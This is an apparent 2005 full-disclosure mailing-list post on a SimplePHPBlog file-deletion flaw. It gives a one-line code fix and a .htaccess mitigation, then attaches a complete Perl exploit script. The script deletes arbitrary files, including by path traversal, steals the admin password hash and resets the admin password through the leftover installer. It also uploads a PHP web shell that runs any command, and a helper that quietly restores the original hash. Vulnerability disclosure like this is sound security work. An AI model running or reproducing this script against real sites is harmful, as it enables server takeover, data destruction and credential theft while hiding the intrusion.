<<< Date Index >>>     <<< Thread Index >>>

SimplePHPBlog Arbitrary File Deletion and Sample Exploit



SimplePHPBlog has a vulnerability in its comment_delete_cgi.php.

The PHP script allows for the arbitrary deletion of files.

Attached is an perl script to demonstrate the exploit.

This vulnerability, in combination with the fact that the installation scripts are left on the server after installation, allows an arbitrary user to reset the admin password to one of the attacker's choosing.

The script demonstrates the ability to delete files, reset the admin password to the attacker's choosing and upload files (including a command prompt).

The exploit is for educational purposes only.

To prevent this exploit change the line in comment_delete_cgi.php
from $logged_in = logged_in( false, true );
to $logged_in = logged_in( true, true );

Sincerely,
'ken'@FTU
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
#!/usr/bin/perl -w
#===============================================================================
#       Title:          sphpblog_vulns.pl
#
#       Written by:     Kenneth F. Belva, CISSP
#                       Franklin Technologies Unlimited, Inc.
#                       http://www.ftusecurity.com
#
#       Date:           August 25, 2005
#
#       Version:        0.1
#
#       Description:    This program is for educational purposes only!
#                       SimplePHPBlog as a few vulnerability which this
#                       perl script demonstrates via an exploit.
#
#       Instructions:   Should be self-explanatory via the .pl help menu
#
#       Solutions:      
#                       *** Solution 1
#                       Change the line in comment_delete_cgi.php from
#                       $logged_in = logged_in( false, true );    to
#                       $logged_in = logged_in( true, true );
#
#                       *** Solution 2
#                       Place an .htaccess file with the following config in
#                       the ./config directory:
#
#
#                       #---------------------
#                       #Snip .htaccess start
#                       #---------------------                  
#                       IndexIgnore *
#
#                       <Files .htaccess>
#                       order allow,deny
#                       deny from all
#                       </Files>
#                       
#                       <Files *.txt>
#                       order allow,deny
#                       deny from all
#                       </Files>
#                       #---------------------
#                       #Snip .htaccess end
#                       #---------------------
#
#
#                       *** Solution 3
#                       See 
http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0885.html
#                               for PHP modification to upload image script.
#===============================================================================



#-------------------------------------------------------------------------------
#       Global Paramaters
#-------------------------------------------------------------------------------
use strict;
use warnings;

use vars qw/ %args /;

use Getopt::Std;
require LWP::UserAgent;
my $ua = LWP::UserAgent->new;

#-------------------------------------------------------------------------------
#       Global Routines
#-------------------------------------------------------------------------------

#Determine Operating System
my $OperatingSystem = $^O;
my $unix = "";

#Set OS Parameter
if (index(lc($OperatingSystem),"win")!=-1){
                   $unix="0"; #windows system
            }else{
                    $unix="1"; #unix system
            }

#-------------------------------------------------------------------------------
#       The Main Menu
#-------------------------------------------------------------------------------

sub menu()
    {
            if ($unix){system("clear");}
                else{system("cls");}

            print "
________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                   http://www.ftusecurity.com
________________________________________________________________________________

        Program : $0
        Version : v0.1
        Date    : 8/25/2005
        Descript: This perl script demonstrates a few flaws in
                  SimplePHPBlog.
        
        Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
                  DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO 
                  NOT HAVE PERMISSION TO DO SO!
                  
                  Please see this script comments for solution/fixes 
                  to demonstrated vulnerabilities. 
                  http://www.simplephpblog.com

        Usage   : $0 [-h host] [-e exploit]
        
                -?      : this menu
                -h      : host
                -e      : exploit
                        (1)     : Upload cmd.php in [site]/images/
                        (2)     : Retreive Password file (hash)
                        (3)     : Set New User Name and Password
                                [NOTE - uppercase switches for exploits]
                                -U      : user name
                                -P      : password
                        (4)     : Delete a System File
                                -F      : Path and System File 

        Examples: $0 -h 127.0.0.1 -e 2
                  $0 -h 127.0.0.1 -e 3 -U l33t -P l33t
                  $0 -h 127.0.0.1 -e 4 -F ./index.php
                  $0 -h 127.0.0.1 -e 4 -F ../../../etc/passwd
                  $0 -h 127.0.0.1 -e 1
        ";      
        
        exit;
    }


#-------------------------------------------------------------------------------
#       Initial Routine
#-------------------------------------------------------------------------------

    sub init()
    {

        use Switch;
        
        # colon ':' after letter says that option takes variable
        my $opt_string = 'e:U:P:h:F:?';
        getopts( "$opt_string", \%args ) or menu();
        
        #Load parameters
        my $exploit = $args{e};
        my $host = $args{h};
        my $user = $args{U};
        my $pass = $args{P};
        my $file = $args{F};
        
        # What shall we do today?
        switch (%args) {
                case "?"        { menu();}
                case "e"        {
                                switch ($exploit) {
                                        
                                        if ($unix){system("clear");}
                                        else{system("cls");}
                                        
                                        print "
________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                    http://www.ftusecurity.com
________________________________________________________________________________";


                                        # Upload cmd.php to /images
                                        case "1" {      print "\nRunning 
cmd.php Upload Exploit....\n\n";
                                                        &UploadCmdPHP($host);}
                                        # Retrieve Username & Password hash
                                        case "2" {      print "\nRunning 
Username and Password Hash Retrieval Exploit....\n\n";
                                                        
&RetrievePwd($host."/config/password.txt");}
                                        # Replace Username and Password
                                        case "3" {      print "\nRunning Set 
New Username and Password Exploit....\n\n";
                                                        
&SetUserPwd($host,$user,$pass);}
                                        # Delete a System File
                                        case "4" {      print "\nRunning Delete 
System File Exploit....\n\n";
                                                        &DeleteFile($host . 
"/comment_delete_cgi.php?y=05&m=08&comment=",$file);}

                                        } #end $exploit switch
                                        print "\n\n\n*** Exploit 
Completed....\nHave a nice day! :)\n";
                                } #end "e" case
                else            { menu();}
                } #end %args switch

    } #end sub init

#-------------------------------------------------------------------------------
#       Exploit #1: Upload File Via POST 
#-------------------------------------------------------------------------------

sub UploadCmdPHP {

        
        my($url) = @_;
        
        use LWP;
        use HTTP::Request::Common qw(POST);
        my $ua = LWP::UserAgent->new;
        
        $HTTP::Request::Common::DYNAMIC_FILE_UPLOAD++;

        #Step 1: Retrieve hash
        #-----------------------------------------------------------------------
        my $hash = &RetrievePwd($url."/config/password.txt");
        

        #Step 2: Delete Existing Password file (SetUserPwd)
        #Step 3: Create a temporary user id and password (SetUserPwd)
        #-----------------------------------------------------------------------
        &SetUserPwd($url,"a","a");
        

        #Step 4: Log into the app and get the PHPSession / my_id session 
variable
        #-----------------------------------------------------------------------
        my $SETcookie = &strip_session(&Login($url . "/login_cgi.php","a","a"));
        
        
        #Step 5: Create and upload our scripts (cmd.php & reset.php)
        #-----------------------------------------------------------------------
                &CreateTempPHPs();
        
        # Upload cmd.php
        my $path = "./cmd.php";
        my $file = "cmd.php";
        my $req = POST($url."/upload_img_cgi.php",
                Cookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,
                Content_Type => 'form-data',
                Content => [userfile => [$path,$file],],
                );
        
        my $response = $ua->request($req);
        print "\nCreated cmd.php on target host: " . $url;
        #$response->is_success or die "Failed to POST '$url': ", 
$response->status_line;
        #return $response->as_string;
        
        # Upload reset.php
        $path = "./reset.php";
        $file = "reset.php";
                
        $req = POST($url."/upload_img_cgi.php",
                Cookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,
                Content_Type => 'form-data',
                Content => [userfile => [$path,$file],],
                );
        
        $response = $ua->request($req);
        print "\nCreated reset.php on target host: " . $url;
        #$response->is_success or die "Failed to POST '$url': ", 
$response->status_line;
        #return $response->as_string;
        
                #Remove local PHP files
                &RemoveTempPHPs();

                
        #Step 6: Reset origional Passwpord
        #-----------------------------------------------------------------------
        &ResetHash($url."/images/reset.php",$hash);

        
        #Step 7: Pass command to delete reset.php (clean up)
        #-----------------------------------------------------------------------
        &DeleteFile($url . 
"/comment_delete_cgi.php?y=05&m=08&comment=","./images/reset.php");
        print "\nRemoved reset.php from target host: " . $url;

        print "\n\nTo run command please go to following link: \n\t" . 
$url."/images/cmd.php?cmd=[your command]";
}

#-------------------------------------------------------------------------------
#       Exploit #2: Retrieve Password File 
#-------------------------------------------------------------------------------

sub RetrievePwd {
        
        my($url) = @_;
        
        use LWP;
        use HTTP::Request::Common;
        my $ua = LWP::UserAgent->new;

        my $req = GET($url);
        
        my $response = $ua->request($req);

        $response->is_success or die "Failed to POST '$url': ", 
$response->status_line;
        
        my $hash = $response->content;
        print "\nRetrieved Username and Password Hash: " . $hash; 
        return $hash

}


#-------------------------------------------------------------------------------
#       Exploit #3: Set New Username and Password 
#-------------------------------------------------------------------------------

sub SetUserPwd{

        my($url,$user,$pass) = @_;

        &DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=", 
"./config/password.txt");
        &ResetPwd($url . 
"/install03_cgi.php?blog_language=english",$user,$pass);
}


#-------------------------------------------------------------------------------
#       POST to Reset Username and Password (must delete password file first)
#-------------------------------------------------------------------------------

sub ResetPwd {
        
        my($url,$user,$pass) = @_;
        
        use LWP;
        use HTTP::Request::Common;
        my $ua = LWP::UserAgent->new;

        my $req = POST($url,
                      [ user  => $user,
                        pass => $pass,
                        submit => '%C2%A0Submit%C2%A0'
                        ]
                );
        
        my $response = $ua->request($req);

        $response->is_success or die "Failed to POST '$url': ", 
$response->status_line;

        print "\n./config/password.txt created!";
        print "\nUsername is set to: ".$user;
        print "\nPassword is set to: ".$pass;
        
}


#-------------------------------------------------------------------------------
#       Exploit #4: Delete Password File 
#-------------------------------------------------------------------------------

sub DeleteFile {
        
        my($url,$file) = @_;
        
        use LWP;
        use HTTP::Request::Common;
        my $ua = LWP::UserAgent->new;

        my $req = GET($url.$file);
        
        my $response = $ua->request($req);

        $response->is_success or die "Failed to POST '$url': ", 
$response->status_line;
        print "\nDeleted File: ".$file; 
        
}


#-------------------------------------------------------------------------------
#       log into site
#-------------------------------------------------------------------------------

sub Login {

        my($url,$user,$pass) = @_;
        
        use LWP;
        use HTTP::Request::Common;
        my $ua = LWP::UserAgent->new;

        my $req = POST($url,
                      [ user  => $user,
                        pass => $pass,
                        submit => '%C2%A0Submit%C2%A0'
                        ]
                );
        
        my $response = $ua->request($req);

        $response->is_success or die "Failed to POST '$url': ", 
$response->status_line;

        print "\nLogged into SimplePHPBlog at: ".$url;
        print "\nCurrent Username '".$user."' and Password '".$pass."'...";
        
        return $response->header('Set-Cookie');
        
}


#-------------------------------------------------------------------------------
#       POST the hash
#-------------------------------------------------------------------------------

sub ResetHash {

        my($url,$hash) = @_;
        
        use LWP;
        use HTTP::Request::Common;
        my $ua = LWP::UserAgent->new;

        my $req = POST($url,
                      [ hash  => $hash]
                );
        
        my $response = $ua->request($req);

        $response->is_success or die "Failed to POST '$url': ", 
$response->status_line;

        print "\nReset Hash at: ".$url;
        print "\nReset Hash value: ".$hash;
        
        
}


#------------------------------------------------------
# Create Temp PHP files
#------------------------------------------------------

sub CreateTempPHPs{

        my($hash) = @_;

        open(PHPFILE, ">./cmd.php");
        print PHPFILE &CreateCmdPHP();
        close PHPFILE;
        print "\nCreated cmd.php on your local machine.";
        
        open(PHPFILE, ">./reset.php");
        print PHPFILE &CreateResetPHP();
        close PHPFILE;
        print "\nCreated reset.php on your local machine.";     
}

#------------------------------------------------------
# Remove Temp PHP files
#------------------------------------------------------

sub RemoveTempPHPs{

        unlink("./cmd.php");
        print "\nRemoved cmd.php from your local machine.";
        unlink("./reset.php");
        print "\nRemoved reset.php from your local machine.";
        
}


#------------------------------------------------------
# strip_session - Get PHP Session Variable
#------------------------------------------------------

sub strip_session {
        
        my($savedata) = @_;

        my $PHPstring = "PHPSESSID";
        my $semi = "\;";
        
        my $datalength = length($savedata);
        my $PHPstart= (index $savedata, $PHPstring)+10;
        my $PHPend = index $savedata,$semi,$PHPstart;
        my $PHPsession= substr $savedata, $PHPstart, ($PHPend-$PHPstart);
        return $PHPsession;
        
}


sub CreateCmdPHP(){
        
        return "

<?php

\$cmd = \$_GET[\'cmd\'];
echo \'<hr/><pre>\';
echo \'Command: \' . \$cmd;
echo '</pre><hr/><br>';

echo '<pre>';
\$last_line = system(\$cmd,\$output);
echo \'</pre><hr/>\';
?>.
"; # end 
        
}


sub CreateResetPHP(){
        
        return "

<?php

\$hash = \$_POST[\'hash\'];
\$fp = fopen(\"../config/password.txt\",\"w\");
fwrite(\$fp,\$hash);
fpclose(\$fp);

?>
"; #end return

}


#------------------------------------------------------
#       Begin Routines
#------------------------------------------------------
        init();